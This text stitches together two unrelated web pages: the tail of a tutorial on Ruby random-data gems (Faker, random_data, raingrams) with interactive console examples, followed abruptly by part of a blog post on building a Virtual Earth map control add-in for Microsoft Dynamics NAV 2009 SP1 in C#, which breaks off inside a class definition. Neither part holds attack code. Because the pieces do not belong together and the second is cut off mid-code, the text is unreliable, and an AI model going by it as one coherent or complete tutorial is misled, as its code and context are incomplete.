solutions", "generate impactful eyeballs"]
Impressed yet? Faker also offers data for multiple locales. For example, maybe you are making a game that takes place in Germany, and you want random character names of the Deutsch variety.
>> Faker::Config.locale = :de >> 10.times.map { Faker::Name.name } => ["Mara Koehl", "Penelope Wagner", "Karolina Kohlmann", "Melek Straub", "Marvin Kettenis", "Lyn Behr", "Karina Deckert", "Janne Damaske", "Sienna Freimuth", "Lias Buder"]
Or maybe you would like company catch phrases…in Spanish.
>> Faker::Config.locale = :es >> 5.times.map { Faker::Company.catch_phrase } => ["adaptador interactiva Extendido", "lÃnea segura tangible Distribuido", "superestructura asÃncrona Diverso", "flexibilidad bidireccional Total", "productividad acompasada Re-implementado"]
Of course, there’s Lorem Ipsum stuff as well.
>> Faker::Lorem.paragraph => "Sit excepturi et possimus et. Quam consequatur placeat fugit aut et sint. Sint assumenda repudiandae veniam iusto tenetur consequatur."
Make sure you check the docs to see what else it can do. Also, if this is really your thing, look at the functional predecessor of Faker, Forgery. It has fallen out of use but seems easy to adapt.
random_data
One of the downsides of Faker is that it doesn’t seem to provide gender-specific name generation. The random_data gem does, although it could use some work (as of version 1.6.0).
$ gem install random_data >> require 'random_data' >> 20.times.map { Random.first_name_female } => ["Donna", "Sharon", "Anna", "Nancy", "Betty", "Margaret", "Maria", "Helena", "Carol", "Cheryl", "Donna", "Cheryl", "Sharon", "Jennifer", "Helena", "Cheryl", "Jessica", "Elizabeth", "Elizabeth", "Sandra"] >> 20.times.map { Random.first_name_male } => ["Richard", "William", "Arthur", "David", "Roger", "Daniel", "Simon", "Anthony", "Adam", "George", "George", "David", "Christopher", "Steven", "Edgar", "Arthur", "Richard", "Kenneth", "Philip", "Charles"]
Looking at these names, they’re a bit…well, let’s just say there’s no “Sheniquoi.”
To be fair, it does have some pretty cool date and location methods.
Random#date appears to pick dates near the current one.
>> 10.times.map { Random.date.strftime('%a %d %b %Y') } => ["Mon 16 Sep 2013", "Sat 21 Sep 2013", "Tue 24 Sep 2013", "Sat 28 Sep 2013", "Thu 03 Oct 2013", "Fri 20 Sep 2013", "Mon 23 Sep 2013", "Tue 24 Sep 2013", "Sun 29 Sep 2013", "Thu 03 Oct 2013"] >> 30.times.map { Random.zipcode } => ["33845", "87791", "27961", "94156", "40897", "24887", "51985", "12099", "82247", "33015", "77437", "93497", "35269", "94426", "58919", "50170", "99952", "62229", "73271", "34316", "17547", "24590", "99613", "52954", "95117", "38454", "70195", "84415", "97096", "58282"] >> 30.times.map { Random.country } => ["Fiji", "Sudan", "Cambodia", "Belgium", "Rwanda", "Czech Republic", "Marshall Islands", "Georgia", "Saudi Arabia", "United Arab Emirates", "Switzerland", "Uganda", "Uruguay", "Somalia", "Ukraine", "Canada", "Jamaica", "Cape Verde", "Indonesia", "Sudan", "Malaysia", "Virgin Islands (U.S.)", "Turkmenistan", "Libya", "Sweden", "St. Vincent and the Grenadines", "Korea, Dem. Rep.", "Faeroe Islands", "Myanmar", "Zimbabwe"]
Note: According to the random_data github page, “zipcodes are totally random and may not be real zipcodes.”
Raingrams
The raingrams gem is probably the most interesting thing in this tutorial. It can produce random sentences or paragraphs based on provided text. For example, if you are some kind of sick, depraved, YouTube comment connoisseur, you could create a monstrosity that generates practically infinite YouTube comments, retraining the model with the worst comments as you go, scraping the depths of absurdity, until you get something like:
“no every conversation with a democrat goes like neil degrasse tyson is basically carl sagan black edition at nintendo years old when I was your age I thought greedy corporations worked like this comment has been deleted because the video has nothing to do with what this mom makes 30 dollars a day filling out richard dawkins surveys which is still a better love story than twilight.”
According to wikipedia, “an n-gram is a contiguous sequence of n items from a given sequence of text or speech. The items can be phonemes, syllables, letters, words or base pairs according to the application.”
Raingrams describes itself as a “flexible and general-purpose ngrams library written in Ruby.” It generates text content by building models based on text occurring in pairs, trios, etc – there doesn’t seem to be a limit on the complexity of the model you can use, but the model classes included go from BigramModel to HexagramModel.
$ gem install raingrams
Creating and training a model is easy.
require 'raingrams' model = Raingrams::BigramModel.new model.train_with_text "When you are courting a nice girl an hour seems like a second. When you sit on a red-hot cinder for a second that seems like an hour. That's relativity." model.random_sentence => "When you sit on a nice girl an hour."
If you include the Raingrams module, you don’t need to use it as a namespace.
include Raingrams model = BigramModel.new
One of the really nice things about Raingrams is the ability to train it with files or web pages instead of just strings. Raingrams provides the following training methods:
Model#train_with_paragraph
Model#train_with_text
Model#train_with_file
Model#train_with_url
I was pleasantly surprised to find that
#train_with_url works…pretty well! It isn’t perfect, and it can create sentences that are cut off, but writing a filter to discard broken sentences is probably easier than writing a scraper for every single site you want to train your models with.
Bigram models can work with very small data sets, but they tend to produce rather incoherent results.
>> require 'raingrams' >> include Raingrams >> model = BigramModel.new >> model.train_with_url "" >> model.random_sentence => "One notable late CPU decodes instructions rather than others before him such as pipelining and 1960s no arguments but still continued by eight binary CPU register may not see 4."
Coherence to the point of almost believability seems to start with quadgrams. Unfortunately, quadgrams require quite a bit of data in order to produce “random” text.
>> model = QuadgramModel.new >> model.train_with_url "" >> model.random_sentence => "Tube computers like EDVAC tended to average eight hours between failures whereas relay computers like the slower but earlier Harvard Mark I which was completed before EDVAC also utilized a stored-program design using punched paper tape rather than electronic memory."
If you wanted to create a “H.P Lovecraft- sounding” prose generator, you could train n-grams models on his stories.
>> model = QuadgramModel.new >> model.train_with_url "" >> model.random_sentence => "Halfway uphill toward our goal we paused for a momentary breathing spell and turned to look again at poor Gedney and were standing in a kind of mute bewilderment when the sounds finally reached our consciousness the first sounds we had heard since coming on the camp horror but other things were equally perplexing." >> model.random_sentence => "First the world s other extremity put an end to any of the monstrous sight was indescribable for some fiendish violation of known natural law seemed certain at the outset."
That missing apostrophe in “world s” is not a typo, and it was present in the original text. You will need to watch for stuff like that.
Conclusion
Ruby has a lot to offer when it comes to random data. Even more, a lot of these libraries would be easy to modify or improve upon. If you are a newcomer to Ruby, and you want to get involved, this is a great opportunity.
Learn the basics of programming with the web's most popular language - JavaScript
A practical guide to leading radical innovation and growth. | https://www.sitepoint.com/tour-random-ruby/ | CC-MAIN-2021-39 | refinedweb | 3,134 | 54.63 |
Hi everyone, I'm having a major problem with a problem that my proffesor gave us to try and solve. Luckily for me it's not graded, but it's the first time I haven't been able to come up with a solution to a problem. I'll list it below, any help would be greatly appreciated.
------------------------------------
Write a program that represents a set as a zero-one integer array. The user of your program will be prompted to type in ome set in the following format followed by a carriage return.
Q = { a, p , k, r }
The name of the set is a single upper-case letter. This is followed by an equal sign and then an opening brace. The set may be an empty set. If the set has elements, they are each input as a single lower case letter. If there are more than two elements, they are separated by commas, according to common usage . The set notation is terminated by a closing brace. When the user types the enter key, the input is finished. There may be zero or more blank spaces insterted anywhere between any two characters of input (demonstrated above).
Anything differing from the above description of a set should be considered an error. In this case the program prints "Error found -- program terminated", Barring errors, the program simply prints out the statement of the set, from information that was placed in the zero-one array. The printing of the set will place one blank space between any two characters, except for commas and the characters they follow (no blanks there). The elements of the set will be printed in alphabetical order (independent of how they were read)and with no gaps. The above example would print: Q={a,k,p,r}
-----------------------------------
Here's where it really sucks people. She gave me a partially completed program from which to work with.
-----------------------------------
To solve this problem, use the "partially completed" program adding in code for each of the different 'cases' within the switch statement.
------------------------------------
Well, there it is. The code she gacve makes no sense to me but I have to use it and only add stuff in the cases. The code is below. Thanks for any help you might be able to give.
-------------------------------------
<code>
#include <iostream.h>
char get_next_char (void);
void print_set(int[], char);
int main() {
int state, bits[26];
bool end_of_set, error_found;
char c, name;
for (int i=0; i<26; i++) bits[i] = 0;
state = 0;
end_of_set = false;
error_found = false;
cout << "Enter a string of the form: A = {x, y, z }" << endl;
cout << "Use an upper case letter for the set name and " << endl;
cout << "single lower case letters for the elements." << endl;
while ((!end_of_set) && (!error_found)) {
switch (state) {
case 0:
break;
case 1:
break;
case 3:
break;
case 4:
break;
case 5:
break;
case 6:
break;
} // end of switch
} // end of while
if (error_found)
cout << "Error found--program terminated." << endl;
else print_set(bits, name);
return 0;
} // end main()
char get_next_char() {
char c;
bool end_of_file;
end_of_file = false;
c = ' '; // Set c to a blank space in order to prime the while
while ((c == ' ') && (!end_of_file)) {
if (( c = cin.get()) == EOF)
{
end_of_file = true;
c = '@'; // Use @ to represent EOF
}
} // end of while
return c;
}
void print_set(int bits[], char name) {
bool need_comma;
need_comma = false;
cout << name << " = {";
for (int i = 0; i < 26; i++)
{
if (bits[i] != 0)
{
if (need_comma) cout << ", ";
cout << (char)((int)'a'+i);
need_comma = true;
}
}
cout << '}'<< endl;
}
</code> | http://cboard.cprogramming.com/cplusplus-programming/11295-major-problem.html | CC-MAIN-2015-27 | refinedweb | 574 | 70.53 |
It's supposed to read a sequence of pairs and then print out the pairs that are not connected.
For instance, if I input : 2,9
it would output: 2 9
If I input afterward: 2,5
it would output: 2 5
however, if I input: 5 2
there would be no output because it is implied that 5 is connected to 9. Therefore no new connection is made.
#include <iostream> using namespace std; static; } }
I need help in understanding what exactly is going on.
For instance when I type 3, enter, 5. It prints 3 5
When I type 3, enter, 9. It prints 3 9
What is happening when I type 5, enter, 9 ?
p = 5
q = 9
How does the program know there is a connection. | http://www.dreamincode.net/forums/topic/312090-quick-find-algorithm-explanation-needed/page__pid__1801865__st__0 | CC-MAIN-2017-39 | refinedweb | 129 | 80.82 |
28 December 2011 05:13 [Source: ICIS news]
SHANGHAI (ICIS)--?xml:namespace>
The company is expected to start building the first phase of the project, which will have a capacity of 1,250 tonnes/year, in early 2012 and complete it by 2014, the source said.
The construction of the second phase, which will have a capacity of 2,500 tonnes/year, will be started after the company has started operating the first phase, the source added.
Shaanxi Tianhong will invest a total of yuan (CNY) 3.7bn ($585m) on the project, the source added.
The producer on 19 December signed an agreement with Centrotherm Photovoltaics for the German polysilicon major to supply the key equipment to the new project, according to a statement from Centrotherm.
($1 = CNY6 | http://www.icis.com/Articles/2011/12/28/9519304/chinas-shaanxi-tianhong-to-build-polysilicon-project-in.html | CC-MAIN-2014-52 | refinedweb | 128 | 68.1 |
This cheat sheets aims to get you up and running with the PCA9532 - a 16 bit I2C IO expander designed for controlling LEDs, which is included on the baseboard from Embedded Artists.
To do this, we'll be looking in more detail at:
The PCA9532 is an IC that is designed for controlling 16 LEDs over and I2C bus, and includes the logic to act as an I2C slave device as well as the drive capability for directly driving LEDs.
As well as being able to switch each of the LEDs on and off independently, the PCA9532 also has two fully programmable PWM controllers that can be used to control one or more of teh LEDs. Each PWM channel has a programmable period ranging from 0.6Hz to 152Hz, and a programmable duty cycle from 0-100%. This means the LEDs can be set to blink steadily and visiblibly, or dimmed.
The PCA9532 device is well documented on the the NXP website that gives links to where to buy it, data sheets as so on
The PCA9532 is fitted to the Embedded artists board, and connected to a bank of 8 red LEDs on pins 0-7, and a bank of 8 green LEDs on pins 8-15. The pull resistors required by the I2C bus are already fitted, and the three additional address bits provided by the PCA9532 are all set to 0.
For this we'll be using the library for the PCA9532. There are two published items for the PCA9532:
Our first simple test is to simply toggle the LEDs on and off. The library defines the modes as :
Our first experiment will use the SetMode function that sets all LEDs
This simple example will blink the LEDs on and off using the API for the PCA9532
The program can be imported here EA_PCA9532_HelloWorld
#include "mbed.h" #include "PCA9532.h" PCA9532 leds (p28, p27, 0xc0); int main() { // Set LED15 to blink using PWM channel 1 leds.Period(1, 0.1); leds.Duty(1, 0.5); leds.SetLed(15, MODE_PWM1); // LED0-14 will fade up in turn, the reset while (1) { // 0x7FFF enables LED 0-14, // which are being switched off leds.SetMode(0x7fff, MODE_OFF); // For each LED in turn for (int i = 0 ; i < 15 ; i++) { // Switch PWM to off, and connect LED(i) leds.Duty(0, 0.0); leds.SetLed(i, MODE_PWM0); // Fade LED(i) from 0 to 1.0 for (float j = 0.0 ; j < 1.0 ; j+=0.01) { leds.Duty(0,j); wait(0.005); } // Set LED(i) to continuously ON // this stops it fading out with LED(i+1) leds.SetLed(i, MODE_ON); wait (0.01); } } // while(1) } // main
This example program can be imported from here EA_PCA9532_Example
Please log in to post a comment. | http://mbed.org/users/chris/notebook/cheat-sheet---ea-baseboard-pca9352/ | crawl-003 | refinedweb | 463 | 68.1 |
And also the other INOI 2017 problem.
And also the other INOI 2017 problem.
Is there a judge where I can test my solution for this problem?
Ok. Maybe it will be 10 then.
Will it be that low? How many people are selected for the next level though?
Here's my solution:
#include <iostream>#include <iomanip>#include <cmath>#include <string>#include <algorithm>#include <list>#include <map>#include <queue>#include <set>#include <stack>#include <utility>#include <vector>using namespace std;int diff(int length, int i, int d) {if (d <= i) return i - d;
Woops! Made a lot of sillies!
Why would you 'learn' that? Implementing it once as a practice is good. But then use the STL, why reinvent the wheel.. unless you wanna add some bits of your own.
I'm getting a WA in a single test case here. Could someone please help me solve that case? Here's the link to my last solution.
Please keep a mathematics problem like ISTA2001 in the coming ICO Prep Competitions. I really liked it. :) | https://www.commonlounge.com/profile/a5f549bfe2ed4c489f371e8c09ab5c7a | CC-MAIN-2020-10 | refinedweb | 175 | 78.96 |
“Roma225” Campaign” and “The Evolution of Aggah: From Roma225 to the RG Campaign” reports.
But, despite the very similar infection chain, this latest attacks revealed a curious variation of the final payload, opening up to different interpretations and hypothesis about the “Aggah” activities.
Technical Analysis
Table 1. Sample’s information
As in most infections, the multi-stage chain starts with a weaponized Office document containing VBA macro code. It immediately appears obfuscated and after a de-obfuscation phase, we discovered it invokes the following OS command:
mshta.exe[.ly/8hsshjahassahsh
The bit.ly link redirects on the attacker’s page hosted on Blogspot at hxxps://myownteammana.blogspot[.com/p/otuego4thday.html. This is the typical Aggah modus operandi. In fact, the webpage source code contains a JavaScript snippet designed to be executed by the MSHTA engine.
This script is obfuscated using a combination of URL-encoding and string reversing. Once again, the script is only a dropper that downloads the next malicious stage hosted on PasteBin. Like the previous Aggah campaigns, the pastes were created by the “hagga” account. This stage is designed to kill the Office suite processes and to create a new registry key to achieve persistence on the target system. This way the hagga dropper would survive the reboot.
In detail, the malware uses three mechanisms to ensure its persistence on the victim machine:
- the creation of a new task called “Windows Update” that triggers every 60 minutes;
- the creation of another task called “Update” that triggers every 300 minutes;
- the setting of “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate” registry key;
Each entry contact pastebin.com to download and execute further payload. The interesting fact is that the URL referred by tasks and regkey are different from each other, so the attacker is able to deliver more than a payload by just changing one of the pastes.
During the analysis, all the three URL pointed to the same script, which is reported in the following screen. The cleaned code reveals a byte array composing Powershell commands. It downloads two other snippets from Pastebin.
The first one corresponds to the “Hackitup” DLL file, previously discussed in our previous report. The second paste is the final payload. In many other Aggah campaigns it corresponds to RevengeRAT, which could also be linked to the Gorgon Group. However, during the analysis we identified another kind of final stage.
The AzoRult Payload
Table 3. Sample’s information
This time, the final payload was a variant of a popular infostealer for sale on the dark markets, AzoRult. It is able to access to saved credentials of the major browser like Chromium, Firefox, Opera, Vivaldi to exfiltrate cookies, credentials and other navigation data.
Having a deeper look to the command and control infrastructure we noticed some interesting details. In fact, we discovered the particular, customized, AzoRult 3.2 fork called “Mana Tools”. At the same time, reviewing the infection chain data revealed the presence of a reference to this “Mana” customization even in the blogspot page abused in the first steps of the chain.
Conclusion
We have monitored the campaign and its final payload for different days finding the attacker delivered AzoRult samples only a few times, during the first days of September 2019, and after that it resumed to deliver RevengeRAT samples.
The “Mana” campaign opens to a series of hypothesis about the threat actor behind it. According to Palo Alto Networks, the “Aggah” infection chain could have been used by GorgonGroup too, but with a different payload. So, it is possible that Gorgon added this particular AzoRult version to their arsenal, maybe to retrieve initial information about its initial victims or to increase their recon capabilities. But the confidence in this scenario is not high enough to confirm it. Another possibility is that another minor cyber criminal leveraged the Aggah infection chain to deliver his AzoRult payload, which is a commodity malware, or also the actors behind the “Hagga” Pastebin account used their own infection chain to conduct its own attack campaign. Many question only further hunting could answer.
Indicator of Compromise
- Hashes
- 7f649548b24721e1a0cff2dafb7269741ff18b94274ac827ba86e6a696e9de87
- 84833991f1705a01a11149c9d037c8379a9c2d463dc30a2fec27bfa52d218fa6
- 37086a162bebaecba466b3706acea19578d99afd2adf1492a074536aa7c742c1
- c2d594e23480215c94dc7f79cf50af3b3b4270fa3a60aea81f877bd787a684a4
- a318ce12ddd1b512c1f9ab1280dc25a254d2a1913e021ae34439de9163354243
- cfd1363ce16156e55460b29bf4d62045ebcd5180af50d732c2353daf12618c18
- Persistence
- schtasks /create /sc MINUTE /mo 60 /tn Windows Update /tr mshta.exe /F
- schtasks /create /sc MINUTE /mo 300 /tn ""Update"" /tr mshta.exe /F
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AvastUpdate
- C2
- hxxp://170.130.205.86/index.php
Yara Rules
import "pe" rule Mana_Aggah_campaign_excel_dropper_Sep_2019{ meta: description = "Yara Rule for Mana campaign Excel dropper" author = "Cybaze Zlab_Yoroi" last_updated = "2019-09-18" tlp = "white" category = "informational" strings: $a1 = {64 68 61 73 6A 00 6B 68 64 61 6B 6A 73 68 00 64 6B 61 28 29} $a2 = {61 70 74 77 4D 71 55 45 27} condition: all of them } rule Mana_Aggah_campaign_injector_Sep_2019{ meta: description = "Yara Rule for Mana campaign DLL injector" author = "Cybaze Zlab_Yoroi" last_updated = "2019-09-18"*) } rule Mana_Aggah_campaign_AzoRult_Sep_2019{ meta: description = "Yara Rule for Mana campaign AzoRult sample" author = "Cybaze Zlab_Yoroi" last_updated = "2019-09-18" tlp = "white" category = "informational" strings: $h1 = {4D 5A 50} $bob1 = {55 8B EC 83 C4 F0 B8 ?? ?? ?? ?? E8} $bob2 = {55 8B EC 83 C4 F0 53 56 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8} $bob3 = {55 8B EC 83 C4 F0 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 ?? ?? ?? ?? E8} $s1 = "SOFTWARE\\Borland\\Delphi\\RTL" ascii wide $s2 = "moz_historyvisits.visit_date" ascii wide $s3 = "\\BitcoinCore_custom\\wallet.dat" ascii wide condition: $h1 and all of ($s*) and 1 of ($bob*) }
This blog post was authored by Antonio Farina and Luca Mella of Cybaze-Yoroi Z-LAB | https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/ | CC-MAIN-2021-43 | refinedweb | 933 | 53.61 |
Following - Hbase is what type of database?
Hbase is a schema less database as it stores data in column families which does not have a fixed or rigid structure to follow.
Q 2 - While reading data from Hbase the command used to get only a specific column instead of all the columns in a column family is
The addcolumn() command displays result for specific column given as a input to this command rather than all the columns in a table, which is the default behavior.
Q 3 - The command which allows you to change an integer value stored in Hbase cell without reading it first is
A - Incrementcolumnvalue()
The incrementcolumnvlaue() command increments the value stored in a Hbase cell without reading it first.
Q 4 - When a region becomes bigger in size, it
B - Spills into new machines
D - Is split into smaller regions
The region gets split into small regions when it grows bigger in size.
Q 5 - The number of namespaces, HDFS provides to the regionservers of a Hbase database is
A - Equal to number of regionserver
B - Half of the number of regionserver
C - Double the number of regionserver
HDFS provides a single namespace to all the RegionServers,and any of them can access the persisted files from any other Regionserver.
Q 6 - In the pseudo-distributed mode, Hbase runs on
C - Either local file system or HDFS
In pseudo-distributed mode Hbase can run on either local file system or HDFS but not both.
Q 7 - 8 - A coprocessor is executed when an event occurs. This type of coprocessor is known as
The observer type of coprocessor is executed when an event occurs.
Q 9 - The Hfile contains variable number of blocks. One fixed blocks in it is the block named file info block and the other one is
in an Hfile only the file infor block and trailer blocks are fixed. All others are optional.
Q 10 - In Hbase there are two situations when the WAL logfiles needs to be replayed. One is when the server fails. The other is when
The only two instances when the logs are replayed is when cluster starts or the server fails. | https://www.tutorialspoint.com/hbase/hbase_online_quiz.htm | CC-MAIN-2020-10 | refinedweb | 363 | 64.04 |
On Wed, Aug 9, 2017 at 6:26 PM, John Stultz <john.stu...@linaro.org> wrote: > On Wed, Aug 9, 2017 at 5:36 PM, Wei Wang <wei...@google.com> wrote: >> On Wed, Aug 9, 2017 at 4:44 PM, John Stultz <john.stu...@linaro.org> wrote: >>> On Wed, Aug 9, 2017 at 4:34 PM, Cong Wang <xiyou.wangc...@gmail.com> wrote: >>>> (Cc'ing Wei whose commit was blamed) >>>> >>>> On Mon, Aug 7, 2017 at 2:15 PM, John Stultz <john.stu...@linaro.org> wrote: >>>>> On Mon, Aug 7, 2017 at 2:05 PM, John Stultz <john.stu...@linaro.org> >>>>> wrote: >>>>>> So, with recent testing with my HiKey board, I've been noticing some >>>>>> quirky behavior with my USB eth adapter. >>>>>> >>>>>> Basically, pluging the usb eth adapter in and then removing it, when >>>>>> plugging it back in I often find that its not detected, and the system >>>>>> slowly spits out the following message over and over: >>>>>> unregister_netdevice: waiting for eth0 to become free. Usage count = 1 >>>>> >>>>> The other bit is that after this starts printing, the board will no >>>>> longer reboot (it hangs continuing to occasionally print the above >>>>> message), and I have to manually reset the device. >>>>> >>>> >>>> So this warning is not temporarily shown but lasts until a reboot, >>>> right? If so it is a dst refcnt leak. >>> >>> Correct, once I get into the state it lasts until a reboot. >>> >>>> How reproducible is it for you? From my reading, it seems always >>>> reproduced when you unplug and plug your usb eth interface? >>>> Is there anything else involved? For example, network namespace. >>> >>> So with 4.13-rc3/4 I seem to trigger it easily, often with the first >>> unplug of the USB eth adapter. >>> >>> But as I get back closer to 4.12, it seemingly becomes harder to >>> trigger, but sometimes still happens. >>> >>> So far, I've not been able to trigger it with 4.12. >>> >>> I don't think network namespaces are involved? Though its out of my >>> area, so AOSP may be using them these days. Is there a simple way to >>> check? >>> >>> I'll also do another bisection to see if the bad point moves back any >>> further. > > So I went through another bisection around and got 9514528d92d4 ipv6: > call dst_dev_put() properly as the first bad commit again. > >> If you see the problem starts to happen on commit >> 9514528d92d4cbe086499322370155ed69f5d06c, could you try reverting all >> the following commits: >> (from new to old) >> 1eb04e7c9e63 net: reorder all the dst flags >> a4c2fd7f7891 net: remove DST_NOCACHE flag >> b2a9c0ed75a3 net: remove DST_NOGC flag >> 5b7c9a8ff828 net: remove dst gc related code >> db916649b5dd ipv6: get rid of icmp6 dst garbage collector >> 587fea741134 ipv6: mark DST_NOGC and remove the operation of dst_free() >> ad65a2f05695 ipv6: call dst_hold_safe() properly >> 9514528d92d4 ipv6: call dst_dev_put() properly > > > And reverting this set off of 4.13-rc4 seems to make the issue go away. > > Is there anything I can test to help narrow down the specific problem > with that patchset? >
Advertising
Thanks John for confirming. Let me spend some time on the commits and I will let you know if I have some debug image for you to try. Wei > thanks > -john | https://www.mail-archive.com/linux-kernel@vger.kernel.org/msg1465669.html | CC-MAIN-2017-34 | refinedweb | 522 | 72.97 |
perl5 - Use a Perl 5 group of modules/features
Use a version of Perl and its feature set:
use perl5; # Same as 'use perl5 v5.10.0;' use perl5 v14.1; use perl5 14.1; use perl5-14.1;
Use a bundled feature set from a
perl5 plugin:
use perl5-i; use perl5-2i; use perl5-modern; use perl5-yourShinyPlugin;
Or both:
use perl5 v14.1 -shiny;
The
perl5 module lets you
use a well known set of modules in one command.
It allows people to create plugins like
perl5::foo and
perl5::bar that are sets of useful modules that have been tested together and are known to create joy.
This module,
perl5, is generally the base class to such a plugin.
This:
use perl5-foo;
Is equivalent in Perl to:
use perl5 '-foo';
The
perl5 module takes the first argument in the
use command, and uses it to find a plugin, like
perl5::foo in this case.
perl5::foo is typically just a subclass of perl5. It invokes a set of modules for its caller.
If you use it with a version, like this:
use perl5 v14;
It is the same as saying:
use v5.14; use strict; use warnings; use feature ':5.14';
If you use
perl5 with no arguments, like this:
use perl5;
It is the same as saying:
use perl5 v10;
This module uses lexically-wrapped-goto-chaining-magic to correctly load a set of modules (including optional version requirements and import options) into the user's code. The API for specifying a perl5 plugin is very simple.
To create a plugin called
perl5::foo that gets called like this:
use perl5-foo;
Write some code like this:
package perl5::foo; use base 'perl5'; our $VERSION = 0.12; # These is the list of modules (with optional version and arguments) sub imports { return ( strict => warnings => features => [':5.10'], SomeModule => 0.22, OtherModule => 0.33, [option1 => 2], Module => [], # Don't invoke Module's import() method ); } 1;
This module was inspired by Michael Schwern's perl5i, and the talk he gave about it at the 2010 OSDC in Melbourne. By "inspired" I mean that I was perturbed by Schwern's non-TMTOWTDI attitude towards choosing a standard set of Perl modules for all of us.
THIS IS PERL! THERE ARE NO STANDARDS!
...and I told him so. I also promised that I would show him my feelings in code. Schwern, this is how I feel! (See also: perl5::i)
Special thanks to schwern, mstrout, audreyt, rodrigo and jesse for ideas and support.
Ingy döt Net <ingy@cpan.org>
This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
See | http://search.cpan.org/~ingy/perl5/lib/perl5.pod | CC-MAIN-2016-30 | refinedweb | 451 | 65.52 |
Red Hat Bugzilla – Bug 213385
Monodevelop does not compile glade projects
Last modified: 2007-11-30 17:11:47 EST
Description of problem:
I cannot compile Glade2 C# projects, when i try to compile a new "fresh" glade2
project monodevelop returned me errors:
--------------------------------------
The type or namespace name `Gtk' could not be found. Are you missing a using
directive or an assembly reference?(CS0246)
........
The type or namespace name `Glade' could not be found. Are you missing a using
directive or an assembly reference?(CS0246)
.....
------------------------------------
If i go on "reference->edit reference", on packages panel i cannot see gtk-sharp
or glade-sharp, but they are installed correctly on mono! because if i compile
externally by command line, the program run fine.
I had this problem also in FC5, and i resolved exporting PKG_CONFIG_PATH in this
way:
export PKG_CONFIG_PATH=/usr/lib/pkgconfig:/usr/lib64/pkgconfig:/usr/share/pkgconfig
but this has no effects on FC6.
I attach the screenshot of the errors.
Version-Release number of selected component (if applicable):
FC6 x86_64
monodevelop 0.12
How reproducible: always
Steps to Reproduce:
1. Create new project C#->glade2.0
2. Try to build the project
3.
Actual results:
SOme error on missing libraries
Expected results:
Building of project
Additional info:
Created attachment 139949 [details]
Screenshot of the error and the reference panel
Odd. I've just fired up monodevelop, created a new Glade2 project and hit F8 to
build the project and there wasn't a problem.
Could you go to the command line and type
rpm -qa gtk-sharp*
and let me know what you're seeing. It is possible that as FC is using multiple
libs now on 64 bit platforms that you're getting some form of conflict that you
shouldn't (it's happened at this end - I solved it by hosing all the the i386
packages)
That said, it's equally possible that I've screwed up somewhere!
[root@localhost seby]# rpm -qa gtk-sharp*
gtk-sharp2-2.10.0-3.fc6
gtk-sharp-1.0.10-12.fc6
Okay, I think I know what the problem is now - as a confirmer, can you type
su
yum -y install gtk-sharp*
and try and run it - I have a feeling I need to change the spec file so that the
-gapi and -devel files are requires.
PERFECT!!! IT RUN!!
thank you so much
Excellent - I thought it would. Out of interest, have you got the
monodevelop-devel package installed?
No, i don't have installed monodevelop-devel
[ Note that the same problem is also on FC5 ;-) ]
Thanks, I was just making sure before I do a build. | https://bugzilla.redhat.com/show_bug.cgi?id=213385 | CC-MAIN-2017-09 | refinedweb | 441 | 60.95 |
Originally posted by Hima Mangal: hi all.. pls have a look at the following code.. What will this program print out ? class Base{ int value = 0; Base(){ addValue(); } void addValue(){ value += 10; } int getValue(){ return value; } } class Derived extends Base{ Derived(){ addValue(); } void addValue(){ value += 20; } } public class Test { public static void main(String[] args){ Base b = new Derived(); System.out.println(b.getValue()); } } 1. 10 2. 20 3. 30 4. 40 the correct answer is 40.. how is this so.. shouldn't the method in the base class constructor call its own addValue() method?? also, if the methods are declared static, the output is 30.. aren't static methods resolved by the type or reference and not by the type of object?? Thanx in advance.. | http://www.coderanch.com/t/199357/java-programmer-SCJP/certification/Pls | CC-MAIN-2014-15 | refinedweb | 126 | 67.86 |
(a small change added that simplifies the SmallVEControl class definition)
With the release of NAV 2009 SP1 CTP2 (to MVPs, TAP and BAP) and the official release of the statement of Direction, I can now write about the last part of the integration to Virtual Earth.
People who hasn’t access to NAV 2009 SP1, will unfortunately have to wait until the official release until they can take advantage of this post.
Please not that you should read Part 1, Part 2 and Part 3 of the Integration to Virtual Earth – and you would have to have the changes to the app. described in these posts in order to make this work.
This post will take advantage of a functionality, which comes in NAV 2009 SP1 called Extensibility. Christian explains some basics about extensibility in a post, which you can find here.
The Goal
As you can see on the above picture, we have a control, which is able to show the map in NAV of the customer location, and as you select different customers in the list, the map changes.
The changes in the map happens without any user interference, so that the user can walk up and down in the list without being irritated. In the Actions menu in the part, we will put an action called Open In Browser, which will open up a map in a browser as explained in part 3.
Note that the Weather factbox is not shown here.
What is it?
The Control inside the Customer Map Factbox is basically just a browser control, in which we set a html document (pretty much like the one described in part 3) and leave it to the browser control to connect to Virtual Earth and retrieve the map. I do not connect to web services from the browser control, instead we transfer parameters of the current customer location to the control.
Although the internal implementation is a browser control, we don’t do html in NAV and we don’t give the control any URL’s or other fancy stuff. The way we make this work is to have the control databind to a Text variable (CustomerLocation), which gets set in OnAfterGetRecord:
CustomerLocation := 'latitude='+FORMAT(Latitude,0,9)+'&longitude='+FORMAT(Longitude,0,9)+'&zoom=15';
The factbox isn’t able to return any value and there isn’t any reason right now to trigger any events from the control.
So now we just need to create a control, which shows the string “latitude=50&longitude=2&zoom=15” differently than a dumb text.
How is the control build?
Let’s just go through the creation of the VEControl step by step.
1. Start Visual Studio 2008 SP1, create a new project of type Class Library and call it VEControl.
2. Add a reference System.Windows.Forms , System.Drawing and to the file C:\Program Files\Microsoft Dynamics NAV\60\RoleTailored Client\Microsoft.Dynamics.Framework.UI.Extensibility.dll – you need to browse and find it. Note that when you copy the VEControl.dll to it’s final location you don’t need to copy this DLL, since it will be loaded into memory from the Client before your DLL is called.
3. Open Project Properties, go to the Signing tab, and sign your DLL with a new key.
4. In the Build Events Tab add the following command to the Post-Build Event window:
copy VEControl.dll "C:\Program Files\Microsoft Dynamics NAV\60\RoleTailored Client\Add-ins"
this ensures that the Control gets installed in the right directory.
5. Delete the automatically generated class1.cs and add another class file called VEControl.cs
6. Add the following class to the file:
/// <summary>
/// Native WinForms Control for Virtual Earth Integration
/// </summary>
public class VEControl : WebBrowser
{
private string template;
